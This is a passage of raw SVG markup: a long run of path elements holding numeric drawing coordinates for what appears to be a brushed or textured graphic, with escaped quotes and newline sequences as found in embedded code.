d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path 